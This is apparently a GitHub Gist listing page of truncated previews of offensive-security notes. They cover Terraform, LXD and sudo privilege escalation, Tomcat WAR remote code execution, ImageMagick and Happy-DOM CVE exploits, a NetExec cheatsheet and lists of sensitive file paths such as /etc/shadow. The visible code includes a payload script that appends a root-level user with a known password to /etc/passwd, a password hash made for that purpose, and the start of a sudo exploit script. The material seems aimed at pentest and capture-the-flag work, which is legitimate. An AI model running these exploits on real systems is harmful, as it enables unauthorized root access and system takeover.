$tr!k0d3r strikoder
:shipit:
Imposter Syndrome
@strikoder
strikoder / Terraform Sudo Privilege Escalation.md
Last active January 11, 2026 16:10
Privilege escalation using sudo on Terraform through various methods

Terraform Sudo Privilege Escalation

Method 1: File Overwrite via Symlink Attack

Option A: /etc/passwd (Add root user)

# Generate MD5 password hash
openssl passwd -1 abcd1234
# Example output: $1$xyz$abc123...
@strikoder
strikoder / lxd-lxc-privilege-escalation.md
Created December 30, 2025 18:22
LXD/LXC privilege escalation guide covering reconnaissance, 3 exploitation methods (existing images, distrobuilder, alpine-builder), and post-exploitation techniques for gaining root access.

LXC/LXD Privilege Escalation

Overview

Members of the lxd or lxc group can escalate privileges to root by abusing container functionality. Privileged containers (security.privileged=true) interact with the host filesystem as root, allowing full system access when the host root is mounted inside the container.

Reconnaissance

Before exploiting, check if container images already exist on the target system:

@strikoder
strikoder / Tomcat-Manager-WAR-RCE-Upload.md
Last active June 1, 2026 21:40
Apache Tomcat 7-9 Manager RCE via WAR deployment - Exploit authenticated access to deploy malicious WAR files for remote code execution

Exploitation Steps

1. Test API Access & Validate Credentials

# Set variables
USER="tomcat"
PASS="password"
RHOST="10.10.10.194"
RPORT="8080"
@strikoder
strikoder / ImageMagick-LFI-Profile-Exploit-CVE-2022-44268.md
Created December 30, 2025 09:06
ImageMagick 7.1.0-49 LFI (CVE-2022-44268) - Read arbitrary files through malicious PNG with embedded Profile field, exploiting metadata processing to extract sensitive data

ImageMagick LFI via Profile Metadata Injection (CVE-2022-44268)

Vulnerability Overview

CVE-2022-44268 affects ImageMagick 7.1.0-49 and allows arbitrary file read through crafted PNG images. This exploit chain leverages two vulnerabilities:

  1. DoS via - filename: Providing - as a filename causes the program to hang
  2. LFI via Profile metadata: Injecting a Profile field into image metadata allows reading arbitrary files

Scenario

  • Target: ImageMagick 7.1.0-49 processing images
  • Attack Vector: Malicious PNG with embedded Profile metadata
@strikoder
strikoder / ImageMagick AppImage LD_LIBRARY_PATH Exploit (CVE-2024-41817).md
Last active December 30, 2025 08:48
ImageMagick vulnerability CVE-2024-41817 - Arbitrary Code Execution via LD_LIBRARY_PATH injection when writable image directory exists.

Vulnerability Overview

CVE-2024-41817 affects ImageMagick AppImage versions ≤7.1.1-35. The AppRun script incorrectly sets LD_LIBRARY_PATH with empty paths, causing ImageMagick to load shared libraries from the current working directory.

Scenario

  • Target: System running identify command from ImageMagick (/usr/bin/ImageMagick identify)
  • Command: identify >>metadata.log (processing images in a directory)
  • Writable Directory: /images (or similar directory where we have write access)
@strikoder
strikoder / happy-dom-CVE-2024-51757-privilege-escalation.md
Last active December 29, 2025 12:54
Proof of concept for CVE-2024-51757 - Happy-DOM privilege escalation vulnerability via /etc/passwd injection

CVE-2024-51757: Happy-DOM Privilege Escalation

Proof of Concept

Step 1: Create Payload Script

File: /tmp/payload.sh

#!/bin/sh
echo 'strikoder:$1$xyz$AtdNQIrMzNYyjUT1XH5IU1:0:0:root:/root:/bin/bash' >> /etc/passwd #su strikoder:abcd1234####
@strikoder
strikoder / CVE-2025-32463 - Sudo Privilege Escalation (1.9.14-1.9.17).md
Last active March 7, 2026 07:54
Privilege escalation vulnerability in sudo versions 1.9.14 through 1.9.17. Allows local users to gain root privileges

CVE-2025-32463 (chroot/chwoot) - Sudo Privilege Escalation Exploit

Quick Run

chmod +x exploit.sh && ./exploit.sh

Exploit Code (exploit.sh)

#!/bin/bash
STAGE=$(mktemp -d /tmp/sudostage.XXXX)
cd "$STAGE"
@strikoder
strikoder / NXC (NetExec) Cheatsheet.md
Created December 1, 2025 12:02
NetExec (NXC) Complete Cheatsheet - Comprehensive reference for network penetration testing with SMB, LDAP, WinRM, RDP, MSSQL, SSH, FTP, VNC, and WMI protocols. Includes password spraying, credential dumping, domain enumeration, and lateral movement techniques.

NXC (NetExec) Cheatsheet

Complete reference for NetExec (NXC) - the network execution tool for pentesting

Version Note: This cheatsheet is based on the latest NetExec version. Always check nxc <protocol> --help and nxc <protocol> -L for your specific version.

Installation

pipx install netexec
# or
@strikoder
strikoder / notion-clean-sidebar.css
Created December 1, 2025 07:17
Clean Notion Sidebar - Remove default navigation items, workspace switcher, and dividers for a minimal sidebar experience
/*
* Clean Notion Sidebar
* Removes default navigation items and workspace switcher for a cleaner look
*
* How to use:
* 1. Install Stylus extension (Chrome/Firefox/Edge)
* 2. Create new style in Stylus
* 3. Copy and paste this CSS
* 4. Set to apply to domain: notion.so
* 5. Save and refresh Notion
@strikoder
strikoder / Windows & Linux File Paths Reference.md
Last active December 1, 2025 20:29
Windows & Linux sensitive file paths for penetration testing - includes webroot locations, config files, logs, and SQL injection LOAD_FILE payloads for common services (IIS, Apache, Nginx, XAMPP, WAMP, Jenkins, FTP, SSH)

Linux & Windows Sensitive Paths Cheatsheet

LINUX

Files

/etc/passwd
/etc/shadow
/etc/profile
/etc/issue